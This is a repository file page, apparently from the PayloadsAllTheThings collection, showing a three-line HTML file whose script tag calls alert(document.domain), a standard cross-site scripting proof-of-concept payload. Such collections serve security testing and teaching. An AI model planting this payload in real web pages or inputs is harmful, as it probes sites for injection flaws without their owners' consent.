PayloadsAllTheThings/XSS Injection/Files/xss.url.url

3 lines
60 B
Text
Raw Normal View History

2019-08-18 10:08:51 +00:00
<html>
<script>alert(document.domain)</script>
</html>